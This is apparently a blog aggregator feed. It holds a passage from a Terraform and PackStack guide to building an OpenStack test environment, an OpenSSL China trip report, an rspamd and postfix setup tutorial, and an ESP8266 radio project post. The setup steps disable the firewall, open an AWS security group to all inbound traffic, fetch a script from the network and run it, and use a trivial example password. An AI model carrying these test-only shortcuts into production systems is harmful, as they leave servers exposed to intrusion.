    go test -v -tags "fixtures acceptance" -run "$1" github.com/gophercloud/gophercloud/acceptance/openstack/$2 | tee ~/gophercloud.log
    popd
  fi
}

You can now run tests by doing:

$ source ~/.bashrc
$ gophercloudtest TestServersCreateDestroy compute/v2

Automating the Process

There's been a lot of work done since first logging into the virtual machine and it would be a hassle to have to do it all over again. It would be better if the entire process was automated, from start to finish.

First, create a new directory on your workstation:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir files
$ cd files
$ vi deploy.sh

In the deploy.sh script, add the following contents:

#!/bin/bash

systemctl disable firewalld
systemctl stop firewalld
systemctl disable NetworkManager
systemctl stop NetworkManager
systemctl enable network
systemctl start network

yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
yum install -y centos-release-openstack-ocata
yum-config-manager --enable openstack-ocata
yum update -y
yum install -y openstack-packstack
packstack --allinone

source /root/keystonerc_admin
nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
_NETWORK_ID=$(openstack network show private -c id -f value)
_SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
_EXTGW_ID=$(openstack network show public -c id -f value)
_IMAGE_ID=$(openstack image show cirros -c id -f value)

echo "" >> /root/keystonerc_admin
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

echo "" >> /root/keystonerc_demo
echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

yum install -y wget
wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
chmod +x /usr/local/bin/gimme
eval "$(/usr/local/bin/gimme 1.8)"
export GOPATH=$HOME/go
export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

go get github.com/gophercloud/gophercloud
pushd ~/go/src/github.com/gophercloud/gophercloud
go get -u ./...
popd

cat >> /root/.bashrc <<EOF
if [[ -f /usr/local/bin/gimme ]]; then
  eval "\$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=\$PATH:$GOROOT/bin:\$GOPATH/bin
fi

gophercloudtest() {
  if [[ -n \$1 ]] && [[ -n \$2 ]]; then
    pushd  ~/go/src/github.com/gophercloud/gophercloud
    go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
    popd
  fi
}
EOF

Next, add the following to main.tf:

  provider "aws" {
    region = "us-west-2"
  }

  resource "aws_key_pair" "openstack" {
    key_name   = "openstack-key"
    public_key = "${file("key/id_rsa.pub")}"
  }

  resource "aws_security_group" "openstack" {
    name        = "openstack"
    description = "Allow all inbound/outbound traffic"

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "tcp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "udp"
      cidr_blocks = ["0.0.0.0/0"]
    }

    ingress {
      from_port   = 0
      to_port     = 0
      protocol    = "icmp"
      cidr_blocks = ["0.0.0.0/0"]
    }

  }

  resource "aws_spot_instance_request" "openstack" {
    ami = "ami-0c2aba6c"
    spot_price = "0.0440"
    instance_type = "m3.xlarge"
    wait_for_fulfillment = true
    spot_type = "one-time"
    key_name = "${aws_key_pair.openstack.key_name}"

    security_groups = ["default", "${aws_security_group.openstack.name}"]

    root_block_device {
      volume_size = 40
      delete_on_termination = true
    }

    tags {
      Name = "OpenStack Test Infra"
    }
  }

+ resource "null_resource" "openstack" {
+  connection {
+    host        = "${aws_spot_instance_request.openstack.public_ip}"
+    user        = "centos"
+    private_key = "${file("key/id_rsa")}"
+  }
+
+  provisioner "file" {
+    source      = "files"
+    destination = "/home/centos/files"
+  }
+
+  provisioner "remote-exec" {
+    inline = [
+      "sudo bash /home/centos/files/deploy.sh"
+    ]
+  }
+ }

  output "ip" {
    value = "${aws_spot_instance_request.openstack.public_ip}"
  }

The above has added a null_resource. null_resource is simply an empty Terraform resource. It's commonly used to store all provisioning steps. In this case, the above null_resource is doing the following:

  1. Configuring the connection to the virtual machine.
  2. Copying the files directory to the virtual machine.
  3. Remotely running the deploy.sh script.

Now when you run Terraform, once the Spot Instance has been created, Terraform will copy the files directory to it and then execute deploy.sh. Terraform will now take approximately 30-40 minutes to finish, but when it has finished, OpenStack will be up and running.

Since a new resource type has been added (null_resource), you will need to run terraform init:

$ pwd
/home/jtopjian/terraform-openstack-test
$ terraform init

Then to run everything from start to finish, do:

$ terraform destroy
$ terraform apply

When Terraform is finished, you will have a fully functional OpenStack environment suitable for testing.

Conclusion

This post detailed how to create an all-in-one OpenStack environment that is suitable for testing applications. Additionally, all configuration was recorded both in Terraform and shell scripts so the environment can be created automatically.

Granted, if you aren't creating a Go-based application, you will need to install other dependencies, but it should be easy to figure out from the example detailed here.

While this setup is a great way to easily build a testing environment, there are still other improvements that can be made. For example, instead of running PackStack each time, an AMI image can be created which already has OpenStack installed. Additionally, multi-node environments can be created for more advanced testing. These methods will be detailed in future posts.

September 30, 2017 06:00 AM

September 28, 2017

OpenSSL

Seven Days and Four Cities in China

We had been invited to spend time with the open source community in China by one of the developers - Paul Yang - who participates in the OpenSSL project. A number of the team members had communicated via email over the last year and when the suggestion was made there were enough of us willing and interested to visit China for a “tour” to make sense. So the tour was agreed as a good thing and that started the journey that lead to spending a week in China (last week as I write this on the plane on the way back to Australia).

What started out as a quick visit to one company rapidly turned into a multi-city, multi-company event - with a mixture of:

  • see “China”
  • visit major companies that use OpenSSL
  • meet with developers who work with or contribute to OpenSSL
  • a half-day presentation session with open source developers at which each member of the OpenSSL team would speak on a different topic.

Our hosts BaishanCloud put an amazing amount of effort into organising the trip - everything was planned for - from the flights, the hotels, who would meet us at the airport, what signs they would hold, what they looked like, and their contact details. Nothing was left to chance.

Our arrival day came and into Shanghai flew the five of us (Matt, Richard, Steve, Tim, and finally Rich) spread out over the day and across multiple airlines and terminals. Despite the logistical challenges the BaishanCloud team made the arrival a very smooth process.

We stayed in fantastic hotels, and at each stage we had a designated guide (from the marketing team) who looked after the logistics. For Shanghai and Hangzhou it was Jane, for Shenzhen it was Shirley, and for Beijing it was Alan. We learned rapidly to simply follow their lead as everything had been planned - even the unexpected.

Paul (Yang Yang), Sean, and Jedo from the BaishanCloud engineering group also accompanied us everywhere. It was great to have the company and be able to interact over the whole trip. Their backgrounds were as different as their personalities and their individual sense of humour.
We spent a lot of time together over the week - from early starts (for the engineers) at 7am for breakfast, to late nights discussing the day, planning the next, and getting to know each other (after 10pm) - we simply kept on the go all the time.

Woven through the complex schedule were tours of some famous Chinese locations - Lingyin Temple in Hangzhou, Shenzhen Sarafi Park in Shenzhen, Imperial Palace / Forbidden City and Shichahai Lake in Beijing.

Our hosts did not just want us to visit people - they wanted us to experience some part of the wonderfully rich history of the Chinese people - a detailed history that goes back far beyond the recorded history of countries that we all came from.

We had many adventures along the journey, and we all experienced a lot. As a team, we discussed many different things: architecture, traffic, cars, culture, working hours, city layout, food, social customs, and the prices of various items. It was fascinating for me to see how each team member's own cultural experiences and viewpoints changed what they saw. Those of us who had travelled and experienced other cultures simply soaked it all in and appreciated the depth and complexity of the uniquely Chinese experiences.

Discussions over dinner about the rich experience made it very clear that we saw different aspects of the experience of this deeply unique culture.

Our Hosts

Our hosts also had their own preconceived notions of what the team would be like - would we be able to eat the food (given how foreign it would be), and could we use chopsticks (we all can, and even those with only minimal chopstick experience used them at every lunch or dinner)? Some of us are definitely less adventurous than others (sticking to mild food that was more familiar), but most of us eagerly tried the huge range of dishes that our hosts provided. At almost every meal we had to say "stop, no more food" as the dishes kept coming out - and with each new dish we wanted to try it, but the stomach can only fit so much food, however interesting and tempting the dish was. It is a testament to the range of food experiences we had that our engineering hosts had themselves never eaten many of the dishes we ate.

By the end of the week, we all recognised many of the dishes, had definite personal preferences, and could all easily pick up individual grains of rice with chopsticks and eat without making too much of a mess on the table. Still, even at the final traditional Chinese meal together we were exposed to dishes we hadn't eaten before, and more food than we could possibly eat. There were also concerns about whether or not we would understand their English (not a problem) - and although we had some very funny moments figuring out what some things meant, there was never a moment where we couldn't figure out how to communicate. Sure, there are lots of strange words and phrases we use that added to the fun - but basic communication simply isn't a problem.

The monkey riding on a chicken

One phrase that does stick in the mind is how our guide (Snow) to the Forbidden City explained things in ways she knew we, as foreigners, would remember - pointing to the roof of a building she said "see what looks like a monkey riding on a chicken - that's an immortal on a phoenix leading the procession of mythical creatures". We saw that "monkey-riding-on-a-chicken" a lot during our time in the Forbidden City. Little things like that helped frame the cultural reference and had us looking for the markers - noticing which buildings were associated with the emperor and which were temples, and how important each building was relative to the others (counting the mythical creatures to place each building's importance in context became second nature).

There is also a clear distinction among the Chinese people we interacted with between those who are immersed in the traditions and culture and those who are much more focused on the future. We all experience that in our own cultures, and it was refreshing to see the full range of viewpoints. Some of our hosts had never before visited or experienced what was being shown to us, and we got to see how they reacted - as expected, different things caught their interest, and we had many discussions about the day's experiences over dinner each evening.

China Is Simply Not Just The Same As Back Home

We are a team, and like all teams we are made up of individuals who had very different experiences. We are shaped by our experiences, and a willingness to be open to new experiences, without mapping them back in terms of our own cultural context, is absolutely critical to getting a rich experience when learning about other cultures.

China is different (as are all cultures), Chinese engineers have different obstacles to overcome to participate in open source projects - obstacles that we as a team should be actively aware of and looking to reduce.

China’s Open Source Leaps

Open source has revolutionised Chinese software engineering, and it has allowed a new generation of companies to take an amazing leap forward - with the building blocks freely available, anyone with an idea and passion can turn that idea into a business, staffed from a huge pool of engineering talent, and be successful. There is innovation and engineering going on in China that equals or exceeds the engineering achievements elsewhere in the world - that was clearly evident in the meetings we had with staff at various companies, from small start-ups through to massively successful major brand names.

Very few companies in the world are pure open source companies - there are unique challenges to making a successful living as an "all-open-source" company. For most companies, it is easy to import or adopt open source; it is much more difficult to contribute back to open source. The same is true in China. Getting the balance right for a company requires education and commitment from both engineering and executives, in order to ensure that the benefits are understood along with the appropriate protections being in place so that the company only contributes what it expects to contribute. The concept of contributing back to the open source community is clearly at an earlier stage in China than it is in the countries of the OpenSSL team members.

How to grow this realisation is something we will be discussing further - and this goes wider, to the entire open source community; it is not something specific to OpenSSL.

Typical Chinese Engineering Work Days

Chinese engineers generally live a long way from the office (journeys of 1-2 hours or longer are common), have to come into the office (it is rare to be able to work from home), and stay late into the evening. Ending at 9pm is common, and catching up with friends and a social life seems to start around 10pm. Getting a 2am WeChat message is considered normal - nothing at all strange.

It wasn't unusual for our hosts to have a full day's work (full from our typical western point of view), then, after making sure we were heading to sleep in our rooms, head out to catch up with friends and colleagues from the companies we had visited during the day - and the next morning be up again early (very early from a Chinese engineer's perspective) to make sure we had breakfast and were ready for the bus ride to the first visit of the day.

Chinese Company Exhibits

The larger companies that we visited all have exhibition areas to show visitors what the company does (and how successful the company is). The larger the company the more focus there was on packing in maximum information into the exhibits. Having 20 separate displays was not unusual. These exhibits were clearly designed for both a Chinese audience and an English audience.

How many products, customers, and engineers, how much revenue, and what problems the company's products solve were all on proud display. It was very interesting watching the reactions of the other team members who clearly hadn't internalised the size and scope of China or the technical developments and achievements of Chinese companies. For me, having been exposed to Chinese companies before and having experienced the different scale at which they operate, it was still a surprise - but much less so than for some of the others.

Open Source Presentation Day

On the Saturday (selected so that it would be easier for engineers to attend), we had a half-day presentation session. We will post the presentations in a week or two, once we are sure we have all the final presentations from both the team members and the two local speakers.

Press Coverage

There have already been at least three articles written based on the interviews with Paul Yang from BaishanCloud, Tim Hudson, and Steve Marquess from the OpenSSL team. We expect there will be many more.

Fond Memories

We experienced the beautiful lakes, trees, forests, temples, art and even some music. We climbed up ancient steps, walked through buildings made long ago, and listened to stories from another century. None of this was why we came to China - but we are all grateful for the experiences that our hosts provided us and the thinking and planning that clearly went into the visit.

We all took photos - ranging from the professional camera equipment (Richard) to the cheapest phone money can buy with a tiny little screen (Steve) to the range of different smartphones the rest of us (Matt, Rich and myself) use on a daily basis. When Richard’s camera ran out of battery he switched to his phone and kept taking photos. We have so many amazing photos that will help us all remember this experience for years to come.

New Friends

I have made new friends on this trip - friends that I plan to stay in touch with, now that I know the "right" way to communicate with China-based engineers. The tools and language may be different - but there is enough in common in our goals and aspirations that we can all work together.

September 28, 2017 01:00 AM

September 27, 2017

The Lone Sysadmin

Software is Always Broken

I’m sitting here watching my iPhone update to iOS 11.0.1. Apple says that there are just a couple of fixes: some security updates and a fix for the Exchange email problems. The update is sure taking a while, though. That’s consistent with my knowledge of how software development works. Color me skeptical that the first […]

The post Software is Always Broken appeared first on The Lone Sysadmin. Head over to the source to read the full post!

by Bob Plankers at September 27, 2017 06:39 AM

Evaggelos Balaskas

Rspamd Fast, free and open-source spam filtering system

Fighting Spam

Fighting email spam in modern times most of the times looks like this:

1ab83c40625d102da1b3001438c0f03b.gif

Rspamd

Rspamd is a rapid spam filtering system. Written in C with a Lua scripting engine for extensions, it is really fast and a really good solution for SOHO environments.

In this blog post, I'll try to present a quickstart guide to running rspamd on a CentOS 6.9 machine with postfix.

DISCLAIMER: This blog post is from a very technical point of view!

Installation

We are going to install rspamd via known rpm repositories:

Epel Repository

We need to install epel repository first:

# yum -y install http://fedora-mirror01.rbc.ru/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm

Rspamd Repository

Now it is time to setup the rspamd repository:

# curl https://rspamd.com/rpm-stable/centos-6/rspamd.repo -o /etc/yum.repos.d/rspamd.repo

Install the gpg key

# rpm --import http://rspamd.com/rpm-stable/gpg.key

and verify the repository with # yum repolist

repo id     repo name
base        CentOS-6 - Base
epel        Extra Packages for Enterprise Linux 6 - x86_64
extras      CentOS-6 - Extras
rspamd      Rspamd stable repository
updates     CentOS-6 - Updates

Rpm

Now it is time to install rspamd to our linux box:

# yum -y install rspamd


# yum info rspamd

Name        : rspamd
Arch        : x86_64
Version     : 1.6.3
Release     : 1
Size        : 8.7 M
Repo        : installed
From repo   : rspamd
Summary     : Rapid spam filtering system
URL         : https://rspamd.com
License     : BSD2c
Description : Rspamd is a rapid, modular and lightweight spam filter. It is designed to work
            : with big amount of mail and can be easily extended with own filters written in
            : lua.

Init File

We need to correct rspamd init file so that rspamd can find the correct configuration file:

# vim /etc/init.d/rspamd

# ebal, Wed, 06 Sep 2017 00:31:37 +0300
## RSPAMD_CONF_FILE="/etc/rspamd/rspamd.sysvinit.conf"
RSPAMD_CONF_FILE="/etc/rspamd/rspamd.conf"

Start Rspamd

We are now ready to start for the first time rspamd daemon:

# /etc/init.d/rspamd restart

syntax OK
Stopping rspamd:                                           [FAILED]
Starting rspamd:                                           [  OK  ]

verify that it is running:

# ps -e fuwww | egrep -i rsp[a]md


root      1337  0.0  0.7 205564  7164 ?        Ss   20:19   0:00 rspamd: main process
_rspamd   1339  0.0  0.7 206004  8068 ?        S    20:19   0:00  _ rspamd: rspamd_proxy process
_rspamd   1340  0.2  1.2 209392 12584 ?        S    20:19   0:00  _ rspamd: controller process
_rspamd   1341  0.0  1.0 208436 11076 ?        S    20:19   0:00  _ rspamd: normal process   

perfect, now it is time to enable rspamd to run on boot:

# chkconfig rspamd on

# chkconfig --list | egrep rspamd
rspamd          0:off   1:off   2:on    3:on    4:on    5:on    6:off

Postfix

In a nutshell, postfix will pass an email through a filter, using the milter protocol, to another application before queuing it to one of postfix's mail queues. Think of milter as a bridge that connects two different applications.

rspamd_milter_direct.png

Rspamd Proxy

In Rspamd 1.6, Rmilter is obsolete, but the rspamd proxy worker supports the milter protocol. That means we need to connect postfix to rspamd_proxy via the milter protocol.

Rspamd has a really nice documentation: https://rspamd.com/doc/index.html
On MTA integration you can find more info.

# netstat -ntlp | egrep -i rspamd

output:

tcp        0      0 0.0.0.0:11332               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 0.0.0.0:11333               0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 127.0.0.1:11334             0.0.0.0:*                   LISTEN      1451/rspamd
tcp        0      0 :::11332                    :::*                        LISTEN      1451/rspamd
tcp        0      0 :::11333                    :::*                        LISTEN      1451/rspamd
tcp        0      0 ::1:11334                   :::*                        LISTEN      1451/rspamd  

# egrep -A1 proxy /etc/rspamd/rspamd.conf


worker "rspamd_proxy" {
    bind_socket = "*:11332";
    .include "$CONFDIR/worker-proxy.inc"
    .include(try=true; priority=1,duplicate=merge) "$LOCAL_CONFDIR/local.d/worker-proxy.inc"
    .include(try=true; priority=10) "$LOCAL_CONFDIR/override.d/worker-proxy.inc"
}

Milter

If you want to know all the possibly configuration parameter on postfix for milter setup:

# postconf | egrep -i milter

output:

milter_command_timeout = 30s
milter_connect_macros = j {daemon_name} v
milter_connect_timeout = 30s
milter_content_timeout = 300s
milter_data_macros = i
milter_default_action = tempfail
milter_end_of_data_macros = i
milter_end_of_header_macros = i
milter_helo_macros = {tls_version} {cipher} {cipher_bits} {cert_subject} {cert_issuer}
milter_macro_daemon_name = $myhostname
milter_macro_v = $mail_name $mail_version
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {mail_host} {mail_mailer}
milter_protocol = 6
milter_rcpt_macros = i {rcpt_addr} {rcpt_host} {rcpt_mailer}
milter_unknown_command_macros =
non_smtpd_milters =
smtpd_milters = 

We are mostly interested in the last two, but it is best to follow the rspamd documentation:

# vim /etc/postfix/main.cf

Adding the below configuration lines:

# ebal, Sat, 09 Sep 2017 18:56:02 +0300

## A list of Milter (mail filter) applications for new mail that does not arrive via the Postfix smtpd(8) server.
non_smtpd_milters = inet:127.0.0.1:11332

## A list of Milter (mail filter) applications for new mail that arrives via the Postfix smtpd(8) server.
smtpd_milters = inet:127.0.0.1:11332

## Send macros to mail filter applications
milter_mail_macros = i {auth_type} {auth_authen} {auth_author} {mail_addr} {client_addr} {client_name} {mail_host} {mail_mailer}

## skip mail without checks if something goes wrong, like rspamd is down !
milter_default_action = accept

Reload postfix

# postfix reload

postfix/postfix-script: refreshing the Postfix mail system

Testing

netcat

From a client:

$ nc 192.168.122.96 25

220 centos69.localdomain ESMTP Postfix
EHLO centos69
250-centos69.localdomain
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN
MAIL FROM: <root@example.org>
250 2.1.0 Ok
RCPT TO: <root@localhost>
250 2.1.5 Ok
DATA
354 End data with <CR><LF>.<CR><LF>
test
.
250 2.0.0 Ok: queued as 4233520144
^]

Logs

Looking through logs may be a difficult task for many; even so, it is a task that you have to do.

MailLog

# egrep 4233520144 /var/log/maillog


Sep  9 19:08:01 localhost postfix/smtpd[1960]: 4233520144: client=unknown[192.168.122.1]
Sep  9 19:08:05 localhost postfix/cleanup[1963]: 4233520144: message-id=<>
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: from=<root@example.org>, size=217, nrcpt=1 (queue active)
Sep  9 19:08:05 localhost postfix/local[1964]: 4233520144: to=<root@localhost.localdomain>, orig_to=<root@localhost>, relay=local, delay=12, delays=12/0.01/0/0.01, dsn=2.0.0, status=sent (delivered to mailbox)
Sep  9 19:08:05 localhost postfix/qmgr[1932]: 4233520144: removed

Everything seems fine with postfix.

Rspamd Log

# egrep -i 4233520144 /var/log/rspamd/rspamd.log

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_message_parse: loaded message; id: <undef>; queue-id: <4233520144>; size: 6; checksum: <a6a8e3835061e53ed251c57ab4f22463>

2017-09-09 19:08:05 #1455(normal) <79a04e>; task; rspamd_task_write_log: id: <undef>, qid: <4233520144>, ip: 192.168.122.1, from: <root@example.org>, (default: F (add header): [9.40/15.00] [MISSING_MID(2.50){},MISSING_FROM(2.00){},MISSING_SUBJECT(2.00){},MISSING_TO(2.00){},MISSING_DATE(1.00){},MIME_GOOD(-0.10){text/plain;},ARC_NA(0.00){},FROM_NEQ_ENVFROM(0.00){;root@example.org;},RCVD_COUNT_ZERO(0.00){0;},RCVD_TLS_ALL(0.00){}]), len: 6, time: 87.992ms real, 4.723ms virtual, dns req: 0, digest: <a6a8e3835061e53ed251c57ab4f22463>, rcpts: <root@localhost>

It works !

Training

If you already have a spam or junk folder, it is really easy to train the Bayesian classifier with rspamc.

I use Maildir, so for my setup the initial training is something like this:

 # cd /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ 

# find . -type f -exec rspamc learn_spam {} \;

Auto-Training

I’ve read a lot of tutorials that suggest real-time training via dovecot plugins or something similar. I personally think that approach adds complexity and for small companies or personal setup, I prefer using Cron daemon:


 @daily /bin/find /storage/vmails/balaskas.gr/evaggelos/.Spam/cur/ -type f -mtime -1 -exec rspamc learn_spam {} \;

That means every day, search for new emails in my spam folder and use them to train rspamd.

Training from mbox

First of all, seriously?

Split mbox

There is a nice and simple way to split an mbox into separate files for rspamc to use:

# awk '/^From / {i++}{print > "msg"i}' Spam

and then feed rspamc:

# ls -1 msg* | xargs rspamc --verbose learn_spam
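If awk isn't to hand, the same split can be sketched in Python using the standard-library mailbox module. This is a hypothetical equivalent, not part of the original setup; the msg1, msg2, ... naming mirrors the awk version above:

```python
import mailbox
import os

def split_mbox(mbox_path, outdir):
    """Split an mbox file into one file per message (msg1, msg2, ...),
    ready to be fed to `rspamc learn_spam`."""
    os.makedirs(outdir, exist_ok=True)
    count = 0
    for i, msg in enumerate(mailbox.mbox(mbox_path), start=1):
        # Write each message out verbatim, including its headers.
        with open(os.path.join(outdir, "msg%d" % i), "wb") as f:
            f.write(msg.as_bytes())
        count = i
    return count
```

Each resulting file can then be passed to rspamc exactly as in the xargs command above.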

Stats

# rspamc stat


Results for command: stat (0.068 seconds)
Messages scanned: 2
Messages with action reject: 0, 0.00%
Messages with action soft reject: 0, 0.00%
Messages with action rewrite subject: 0, 0.00%
Messages with action add header: 2, 100.00%
Messages with action greylist: 0, 0.00%
Messages with action no action: 0, 0.00%
Messages treated as spam: 2, 100.00%
Messages treated as ham: 0, 0.00%
Messages learned: 1859
Connections count: 2
Control connections count: 2157
Pools allocated: 2191
Pools freed: 2170
Bytes allocated: 542k
Memory chunks allocated: 41
Shared chunks allocated: 10
Chunks freed: 0
Oversized chunks: 736
Fuzzy hashes in storage "rspamd.com": 659509399
Fuzzy hashes stored: 659509399
Statfile: BAYES_SPAM type: sqlite3; length: 32.66M; free blocks: 0; total blocks: 430.29k; free: 0.00%; learned: 1859; users: 1; languages: 4
Statfile: BAYES_HAM type: sqlite3; length: 9.22k; free blocks: 0; total blocks: 0; free: 0.00%; learned: 0; users: 1; languages: 1
Total learns: 1859

X-Spamd-Result

To view the spam score in every email, we need to enable extended reporting headers and to do that we need to edit our configuration:

# vim /etc/rspamd/modules.d/milter_headers.conf

and just above the "use = [];" line add:

    # ebal, Wed, 06 Sep 2017 01:52:08 +0300
    extended_spam_headers = true;

   use = [];

then reload rspamd:

# /etc/init.d/rspamd reload

syntax OK
Reloading rspamd:                                          [  OK  ]

View Source

If you open the email and view the source, you will see something like this:


X-Rspamd-Queue-Id: D0A5728ABF
X-Rspamd-Server: centos69
X-Spamd-Result: default: False [3.40 / 15.00]

Web Server

Rspamd comes with its own web server. That is really useful if you don't have a web server on your mail server, but it is not recommended.

By default, the rspamd web server only listens for local connections. We can see that from the ss output below:

# ss -lp | egrep -i rspamd

LISTEN     0      128                    :::11332                   :::*        users:(("rspamd",7469,10),("rspamd",7471,10),("rspamd",7472,10),("rspamd",7473,10))
LISTEN     0      128                     *:11332                    *:*        users:(("rspamd",7469,9),("rspamd",7471,9),("rspamd",7472,9),("rspamd",7473,9))
LISTEN     0      128                    :::11333                   :::*        users:(("rspamd",7469,18),("rspamd",7473,18))
LISTEN     0      128                     *:11333                    *:*        users:(("rspamd",7469,16),("rspamd",7473,16))
LISTEN     0      128                   ::1:11334                   :::*        users:(("rspamd",7469,14),("rspamd",7472,14),("rspamd",7473,14))
LISTEN     0      128             127.0.0.1:11334                    *:*        users:(("rspamd",7469,12),("rspamd",7472,12),("rspamd",7473,12))

127.0.0.1:11334

So if you want to change that (don't), you have to edit rspamd.conf (the core file):

# vim +/11334 /etc/rspamd/rspamd.conf

and change this line:

bind_socket = "localhost:11334";

to something like this:

bind_socket = "YOUR_SERVER_IP:11334";

or use sed:

# sed -i -e 's/localhost:11334/YOUR_SERVER_IP:11334/' /etc/rspamd/rspamd.conf

and then fire up your browser:

rspamd_worker.png

Web Password

It is good practice to change the default password of this web GUI to something else.

# vim /etc/rspamd/worker-controller.inc

  # password = "q1";
  password = "password";

It is always a good idea to restart rspamd after a change like this.

Reverse Proxy

I don't like having any web app exposed without SSL or basic authentication, so I shall put the rspamd web server behind a reverse proxy (apache).

So on httpd-2.2 the configuration is something like this:

ProxyPreserveHost On

<Location /rspamd>
    AuthName "Rspamd Access"
    AuthType Basic
    AuthUserFile /etc/httpd/rspamd_htpasswd
    Require valid-user

    ProxyPass http://127.0.0.1:11334
    ProxyPassReverse http://127.0.0.1:11334 

    Order allow,deny
    Allow from all 

</Location>

Http Basic Authentication

You need to create the file that is going to store usernames and passwords for basic authentication:

# htpasswd -csb /etc/httpd/rspamd_htpasswd rspamd rspamd_passwd
Adding password for user rspamd

restart your apache instance.

bind_socket

Of course, for this to work, we need to change the bind socket in rspamd.conf back to localhost.
Don't forget this ;)

bind_socket = "127.0.0.1:11334";

Selinux

If there is a problem with SELinux, then:

# setsebool -P httpd_can_network_connect=1

or

# setsebool httpd_can_network_connect_db on

Errors ?

If you see an error like this when running rspamc:

IO write error

then you need to explicitly tell rspamc which address to use:

rspamc -h 127.0.0.1:11334

To prevent any future errors, I’ve created a shell wrapper:

/usr/local/bin/rspamc

#!/bin/sh
exec /usr/bin/rspamc -h 127.0.0.1:11334 "$@"

Final Thoughts

I have been using rspamd for a while now and I am pretty happy with it.

I've set up a spamtrap email address to feed my spam folder and let the cron script train rspamd.

So after a thousand emails:

rspamd1k.jpg

September 27, 2017 12:05 AM

September 25, 2017

Steve Kemp's Blog

Started work on an internet-of-things Radio

So recently I was in York at the Bytemark office, and I read a piece about building a radio in a Raspberry Pi magazine. It got me curious, so when I got home to sunny Helsinki I figured I'd have a stab at it.

I don't have a fixed goal in mind, but what I do have is:

  • A WeMos Mini D1
    • Cost €3.00
    • ESP8266-powered board, which can be programmed easily in C++ and contains on-board WiFi as well as a bunch of I/O pins.
  • A RDA5807M FM Radio chip.
    • Cost 37 cents.
    • With a crystal for support.

The initial goal is simple: wire the receiver/decoder to the board, and listen to the radio.

After that there are obvious extensions, such as adding an LCD display to show the frequency (What's the frequency, Kenneth?), and later to show the station details, via RDS.

Finally I could add some buttons/switches/tweaks for selecting next/previous stations, and adjusting the volume. Initially that'll be handled by pointing a browser at the IP-address of the device.

The first attempt at using the RDA5807M chip was a failure, as the thing was too damn small and oddly sized. Adding header-pins to the chip was almost impossible, and when I did get them soldered on, the thing just gave me static hisses.

However, I later read the details of the chip more carefully and realized that it isn't powerful enough to drive (even) headphones. It requires an amp of some kind. With that extra knowledge I was able to send the output to the powered speakers I have sat beside my PC.

My code is basic, it sets up the FM-receiver/decoder, and scans the spectrum. When it finds a station it outputs the name over the serial console, via RDS, and then just plays it.

I've got a PAM8403-based amplifier board on order; when that arrives I'll get back to the project, and hook up WiFi and a simple web-page to store stations, tuning, etc.

My "token goal" at the moment is a radio that switches on at 7AM and switches off at 8AM. In addition to that it'll serve a web-page allowing interactive control, regardless of any buttons that are wired in.

I also have another project in the wings. I've ordered a software-defined radio (USB-toy) which I'm planning to use to plot aircraft in real-time, as they arrive/depart/fly over Helsinki. No doubt I'll write that up too.

September 25, 2017 09:00 PM

September 24, 2017

Raymii.org

Adding IPv6 to a keepalived and haproxy cluster

At work I regularly build high-available clusters for customers, where the setup is distributed over multiple datacenters with failover software. If one component fails, the service doesn't experience issues or downtime due to the failure. Recently I was tasked with expanding a cluster setup to be also reachable via IPv6. This article goes over the settings and configuration required for haproxy and keepalived for IPv6. The internal cluster will only be IPv4, the loadbalancer terminates HTTP and HTTPS connections.

September 24, 2017 12:00 AM

September 23, 2017

Sarah Allen

memories of dragons

On my recent trip to Krakow, I bought a little blue stuffed dragon for my niece. I became curious about the legend of the Krakow dragon and wanted to find a children's story to listen to (and maybe learn a little Polish); I found a fun, modern interpretation: Smok.

Two photos: Krakow dragon statue  and child shadow that kind of looks like a dragon

by sarah at September 23, 2017 03:52 PM

Evaggelos Balaskas

Walkaway by Cory Doctorow

